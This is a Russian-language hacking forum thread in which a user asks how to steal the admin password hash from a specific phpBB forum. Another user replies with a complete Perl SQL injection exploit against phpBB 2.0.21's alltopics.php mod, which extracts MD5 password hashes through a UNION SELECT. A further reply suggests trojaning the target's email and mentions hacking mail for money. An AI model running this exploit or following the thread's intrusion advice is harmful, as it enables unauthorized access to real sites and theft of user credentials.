Просмотр полной версии : Powered by phpBB and NoseBleed v1.12
Поиск по запросу NoseBleed вообще нечиго не выдает.
Версию с помощью docs/CHANGELOG.html не получилось узнать. пишет
Forbidden
You don't have permission to access /docs/CHANGELOG.html on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Форум адреса таким образом расположен
http://forum.*****.ru
Это что-то меняет?
и какие уязвимости есть у этого движка? мне бы хеш админский достать.
Morfusha
28.05.2007, 14:31
1. http://forum.*****.ru это ничего не меняет
2. Для phpbb 2.0.21 в пабилке сплойтов нету
Powered by phpBB and NoseBleed v1.12 - это разве 2.0.21 ?
Powered by phpBB and NoseBleed v1.12 - это разве 2.0.21 ?
The original NoseBleed v1.12 skin for phpBB version 2+
Created by Mike Lothar (c) 2004 - 2005
http://www.mikelothar.com
Do not remove this copyright note
REDsaratov
04.06.2007, 15:51
Попробуй этот
ђЇ†man.inc.
23.08.2006, 21:07
#!/usr/bin/perl
print q{
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++
+ +
+ phpBB 2.0.21 (alltopics.php) SQL Injection Exploit +
+ +
+ bd0rk || SOH-Crew +
+ +
+ Mod:http:"//"www".phpbbhacks.com/download/2821 +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++
};
use IO::Socket;
print q{
=> Insert URL
=> without ( http )
=> };
$server = <STDIN>;
chop ($server);
print q{
=> Insert directory
=> es: /forum/ - /phpBB2/
=> };
$dir = <STDIN>;
chop ($dir);
print q{
=> User ID
=> Number:
=> };
$user = <STDIN>;
chop ($user);
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "alltopics.php?mode=&order=ASC&start=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_ users%20where%20user_id=".$user ;
print "
=> Exploit in process...\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";
print "Exploit\r\n";
print "in process...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "Exploit finished!\r\n\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "MD5-Hash is: ".$1."\r\n";
}
exit();
}
}
Basurman
06.06.2007, 01:09
Блин. сплоит выше это сплоит на оч редкий мод.
Есть 2 варианта:
1. Достать админ пароль
2. Троянить почту, тем более что ты почту ломаешь мегаацки и за деньги :D :rolleyes:
Если админ стер /docs/CHANGELOG.html, то это уже что-то значит...
Basurman
09.06.2007, 22:58
Кстати, еще инфа к размышлению:
http://www.securitylab.ru/vulnerability/281494.php
Исправлена в 2.0.22
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot